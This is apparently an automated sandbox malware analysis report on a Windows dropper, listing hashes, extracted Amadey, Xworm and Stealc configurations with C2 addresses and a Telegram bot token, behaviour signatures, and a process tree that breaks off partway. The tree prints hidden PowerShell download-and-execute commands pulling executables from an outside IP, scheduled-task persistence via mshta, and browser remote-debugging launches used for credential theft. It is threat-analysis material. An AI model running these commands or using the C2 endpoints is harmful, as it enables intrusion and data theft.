Analysis

  • max time kernel
    144s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22/02/2025, 07:54

General

  • Target

    88345910e7756216c80bf4046952980b.exe

  • Size

    2.1MB

  • MD5

    88345910e7756216c80bf4046952980b

  • SHA1

    f508e862e3d2b48a83dfa064d4655035953482c0

  • SHA256

    c9b511ede4963bc4ce43425a950014c7b4fedde81add8febb049359e2d3e4704

  • SHA512

    a53f0242ae77be006bf9d22b42764de414f94e98dd5eb716db5d7286555826a3317a80a00c0c2448ad836c16181168c5f77da954cc29978f1d023bac42d28845

  • SSDEEP

    49152:yhpo+E+QRPrT0O7tDr5uWwt4ZKYXhRn+lOxfMfps:yhy+xIzT0A5uruXLn+lOxfMf

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/defend/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Extracted

Family

xworm

Version

5.0

C2

185.163.204.65:7000

Mutex

SWaSxcOz2FkLWFU7

Attributes
  • install_file

    USB.exe

  • telegram

    https://api.telegram.org/bot7801507553:AAER1leGn_BtfmbwwWVlXFOz-GpclQKTfe0/sendMessage?chat_id=6012304042

aes.plain

Extracted

Family

amadey

Version

5.21

Botnet

a4d2cd

C2

http://cobolrationumelawrtewarms.com

http://�������� jlgenfekjlfnvtgpegkwr.xyz

Attributes
  • install_dir

    a58456755d

  • install_file

    Gxtuum.exe

  • strings_key

    00fadbeacf092dfd58b48ef4ac68f826

  • url_paths

    /3ofn3jf3e2ljk/index.php

rc4.plain

Extracted

Family

stealc

Botnet

reno

C2

http://185.215.113.115

Attributes
  • url_path

    /c4becf79229cb002.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detect Poverty Stealer Payload 1 IoCs
  • Detect Vidar Stealer 1 IoCs
  • Detect Xworm Payload 2 IoCs
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Gcleaner family
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • Poverty Stealer

    Poverty Stealer is a crypto and infostealer written in C++.

  • Povertystealer family
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Vidar family
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 19 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file 20 IoCs
  • Uses browser remote debugging 2 TTPs 9 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks BIOS information in registry 2 TTPs 38 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 7 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 29 IoCs
  • Identifies Wine through registry keys 2 TTPs 19 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Adds Run key to start application 2 TTPs 5 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • AutoIT Executable 3 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 19 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Windows directory 2 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 56 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 33 IoCs
  • Suspicious use of FindShellTrayWindow 40 IoCs
  • Suspicious use of SendNotifyMessage 13 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\88345910e7756216c80bf4046952980b.exe
    "C:\Users\Admin\AppData\Local\Temp\88345910e7756216c80bf4046952980b.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks computer location settings
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:1564
    • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Downloads MZ/PE file
      • Checks BIOS information in registry
      • Checks computer location settings
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:400
      • C:\Users\Admin\AppData\Local\Temp\1091048001\7tzlyz8.exe
        "C:\Users\Admin\AppData\Local\Temp\1091048001\7tzlyz8.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: AddClipboardFormatListener
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        PID:4764
      • C:\Users\Admin\AppData\Local\Temp\1091274101\3dc1ff6f06.exe
        "C:\Users\Admin\AppData\Local\Temp\1091274101\3dc1ff6f06.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:936
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c schtasks /create /tn 5ndDrmataqB /tr "mshta C:\Users\Admin\AppData\Local\Temp\nKVMBIQ19.hta" /sc minute /mo 25 /ru "Admin" /f
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1740
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /create /tn 5ndDrmataqB /tr "mshta C:\Users\Admin\AppData\Local\Temp\nKVMBIQ19.hta" /sc minute /mo 25 /ru "Admin" /f
            5⤵
            • System Location Discovery: System Language Discovery
            • Scheduled Task/Job: Scheduled Task
            PID:4380
        • C:\Windows\SysWOW64\mshta.exe
          mshta C:\Users\Admin\AppData\Local\Temp\nKVMBIQ19.hta
          4⤵
          • Checks computer location settings
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:4756
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'RY6IWSBC9EJ5WXMAUHZ7FM4GZ6RXHW7H.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Downloads MZ/PE file
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4760
            • C:\Users\Admin\AppData\Local\TempRY6IWSBC9EJ5WXMAUHZ7FM4GZ6RXHW7H.EXE
              "C:\Users\Admin\AppData\Local\TempRY6IWSBC9EJ5WXMAUHZ7FM4GZ6RXHW7H.EXE"
              6⤵
              • Modifies Windows Defender DisableAntiSpyware settings
              • Modifies Windows Defender Real-time Protection settings
              • Modifies Windows Defender TamperProtection settings
              • Modifies Windows Defender notification settings
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Windows security modification
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2560
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1091275021\am_no.cmd" "
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:836
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1091275021\am_no.cmd" any_word
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:388
          • C:\Windows\SysWOW64\timeout.exe
            timeout /t 2
            5⤵
            • System Location Discovery: System Language Discovery
            • Delays execution with timeout.exe
            PID:4504
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:4316
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3552
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:1884
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1520
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:1152
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:5044
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /create /tn "koAiCmaZmPq" /tr "mshta \"C:\Temp\059knWxs8.hta\"" /sc minute /mo 25 /ru "Admin" /f
            5⤵
            • System Location Discovery: System Language Discovery
            • Scheduled Task/Job: Scheduled Task
            PID:4296
          • C:\Windows\SysWOW64\mshta.exe
            mshta "C:\Temp\059knWxs8.hta"
            5⤵
            • Checks computer location settings
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2800
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
              6⤵
              • Blocklisted process makes network request
              • Command and Scripting Interpreter: PowerShell
              • Downloads MZ/PE file
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:5068
              • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                7⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:3164
      • C:\Users\Admin\AppData\Local\Temp\1091320001\d538f57e36.exe
        "C:\Users\Admin\AppData\Local\Temp\1091320001\d538f57e36.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        PID:680
        • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
          "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2596
      • C:\Users\Admin\AppData\Local\Temp\1091321001\9d1f9cbe0c.exe
        "C:\Users\Admin\AppData\Local\Temp\1091321001\9d1f9cbe0c.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:3092
      • C:\Users\Admin\AppData\Local\Temp\1091322001\5f380d8c90.exe
        "C:\Users\Admin\AppData\Local\Temp\1091322001\5f380d8c90.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:1904
      • C:\Users\Admin\AppData\Local\Temp\1091323001\ftS1RPn.exe
        "C:\Users\Admin\AppData\Local\Temp\1091323001\ftS1RPn.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:3112
      • C:\Users\Admin\AppData\Local\Temp\1091324001\ebp51gY.exe
        "C:\Users\Admin\AppData\Local\Temp\1091324001\ebp51gY.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:3740
      • C:\Users\Admin\AppData\Local\Temp\1091325001\DF9PCFR.exe
        "C:\Users\Admin\AppData\Local\Temp\1091325001\DF9PCFR.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        PID:744
        • C:\Users\Admin\AppData\Local\Temp\1091325001\DF9PCFR.exe
          "C:\Users\Admin\AppData\Local\Temp\1091325001\DF9PCFR.exe"
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:3852
      • C:\Users\Admin\AppData\Local\Temp\1091326001\uXivbut.exe
        "C:\Users\Admin\AppData\Local\Temp\1091326001\uXivbut.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Checks computer location settings
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:1988
        • C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
          "C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:4364
          • C:\Users\Admin\AppData\Roaming\10000180100\sha256.exe
            "C:\Users\Admin\AppData\Roaming\10000180100\sha256.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:4496
      • C:\Users\Admin\AppData\Local\Temp\1091327001\8QQOJj9.exe
        "C:\Users\Admin\AppData\Local\Temp\1091327001\8QQOJj9.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:3080
      • C:\Users\Admin\AppData\Local\Temp\1091328001\04bc3c33ae.exe
        "C:\Users\Admin\AppData\Local\Temp\1091328001\04bc3c33ae.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1300
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          PID:1172
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
            5⤵
              PID:4312
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
            4⤵
              PID:1136
          • C:\Users\Admin\AppData\Local\Temp\1091329001\2d7e0e2767.exe
            "C:\Users\Admin\AppData\Local\Temp\1091329001\2d7e0e2767.exe"
            3⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4024
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
              4⤵
                PID:4164
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                4⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of AdjustPrivilegeToken
                PID:2308
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                  5⤵
                    PID:3852
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                  4⤵
                    PID:712
                • C:\Users\Admin\AppData\Local\Temp\1091330001\7tzlyz8.exe
                  "C:\Users\Admin\AppData\Local\Temp\1091330001\7tzlyz8.exe"
                  3⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3596
                • C:\Users\Admin\AppData\Local\Temp\1091331001\2f49ddd8ab.exe
                  "C:\Users\Admin\AppData\Local\Temp\1091331001\2f49ddd8ab.exe"
                  3⤵
                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                  • Checks BIOS information in registry
                  • Executes dropped EXE
                  • Identifies Wine through registry keys
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • Suspicious use of SetThreadContext
                  • System Location Discovery: System Language Discovery
                  PID:1900
                  • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                    "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                    4⤵
                    • System Location Discovery: System Language Discovery
                    PID:976
                • C:\Users\Admin\AppData\Local\Temp\1091332001\cfab217946.exe
                  "C:\Users\Admin\AppData\Local\Temp\1091332001\cfab217946.exe"
                  3⤵
                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                  • Checks BIOS information in registry
                  • Executes dropped EXE
                  • Identifies Wine through registry keys
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • System Location Discovery: System Language Discovery
                  PID:3200
                • C:\Users\Admin\AppData\Local\Temp\1091334001\3aa1c2e209.exe
                  "C:\Users\Admin\AppData\Local\Temp\1091334001\3aa1c2e209.exe"
                  3⤵
                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                  • Checks BIOS information in registry
                  • Executes dropped EXE
                  • Identifies Wine through registry keys
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • System Location Discovery: System Language Discovery
                  • Checks processor information in registry
                  PID:4920
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                    4⤵
                    • Uses browser remote debugging
                    • Enumerates system info in registry
                    • Modifies data under HKEY_USERS
                    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of FindShellTrayWindow
                    PID:1072
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xc8,0x104,0x7ff8b3a4cc40,0x7ff8b3a4cc4c,0x7ff8b3a4cc58
                      5⤵
                        PID:4972
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1924,i,16580839361355849462,15151393390753264080,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1920 /prefetch:2
                        5⤵
                          PID:1784
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2152,i,16580839361355849462,15151393390753264080,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2188 /prefetch:3
                          5⤵
                            PID:2744
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2216,i,16580839361355849462,15151393390753264080,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2496 /prefetch:8
                            5⤵
                              PID:2920
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3188,i,16580839361355849462,15151393390753264080,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3232 /prefetch:1
                              5⤵
                              • Uses browser remote debugging
                              PID:4528
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3196,i,16580839361355849462,15151393390753264080,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3300 /prefetch:1
                              5⤵
                              • Uses browser remote debugging
                              PID:2368
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4528,i,16580839361355849462,15151393390753264080,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4516 /prefetch:1
                              5⤵
                              • Uses browser remote debugging
                              PID:4360
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3852,i,16580839361355849462,15151393390753264080,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4600 /prefetch:8
                              5⤵
                                PID:3164
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4608,i,16580839361355849462,15151393390753264080,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4624 /prefetch:8
                                5⤵
                                  PID:2904
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4896,i,16580839361355849462,15151393390753264080,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4948 /prefetch:8
                                  5⤵
                                    PID:5480
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4580,i,16580839361355849462,15151393390753264080,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4996 /prefetch:8
                                    5⤵
                                      PID:5552
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                    4⤵
                                    • Uses browser remote debugging
                                    PID:5396
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
